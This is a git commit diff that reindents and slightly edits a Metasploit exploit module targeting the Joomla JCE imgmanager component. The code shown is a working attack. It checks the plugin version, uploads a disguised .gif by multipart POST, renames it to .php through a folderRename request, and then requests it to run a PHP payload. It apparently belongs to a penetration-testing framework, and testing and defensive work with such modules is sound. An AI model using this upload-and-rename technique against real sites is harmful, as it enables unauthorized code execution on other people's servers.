correct some bad indent

2013-03-24 21:07:51 -03:00 · 2013-03-24 21:07:51 -03:00 · 0c169f94eb
parent 50ac5cf247
commit 0c169f94eb
1 changed files with 7 additions and 8 deletions
--- a/modules/exploits/multi/http/joomla_comjce_imgmanager.rb
+++ b/modules/exploits/multi/http/joomla_comjce_imgmanager.rb
@ -33,10 +33,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Payload'        =>
 				{
-                    'Space'       => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
-                    'DisableNops' => true,
-                    'BadChars'    => "#",
-                    'Keys'        => ['php'],
+					'Space'       => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
+					'DisableNops' => true,
+					'BadChars'    => "#",
+					'Keys'        => ['php'],
 					'Compat'      =>
 						{
 							'ConnectionType' => 'find',
@ -58,7 +58,6 @@ class Metasploit3 < Msf::Exploit::Remote

 	def get_version
 		# check imgmanager version
-		#uri = normalize_uri(target_uri.path.to_s, "images", "stories", "#{@script_name}.php")
 		@uri_base = normalize_uri(target_uri.path.to_s) + 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager'
 		uri =  @uri_base
 		print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
@ -96,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Generate some random strings
 		@script_name  	= rand_text_alpha_lower(6)
 		boundary   		= '-' * 27 + rand_text_numeric(11)
-        uri = normalize_uri(@uri_base) + '&method=form'
+		uri = @uri_base + '&method=form'

 		# POST data
 		post_data = Rex::MIME::Message.new
@ -132,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote

 	def renamed?
 		# Rename the file from .gif to .php
-		uri = normalize_uri(@uri_base) #, '&version=1576&cid=20')
+		uri = @uri_base # '&version=1576&cid=20'

 		data =	"json={\"fn\":\"folderRename\",\"args\":[\"/#{@script_name}.gif\",\"#{@script_name}.php\"]}"

@ -163,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		directory   = 'images/stories/'
 		print_status("Calling payload: #{@script_name}.php")
 		uri = normalize_uri(target_uri.path.to_s)
-	    uri << directory + @script_name + ".php"
+		uri << directory + @script_name + ".php"
 		register_files_for_cleanup(uri)

 		res = send_request_cgi({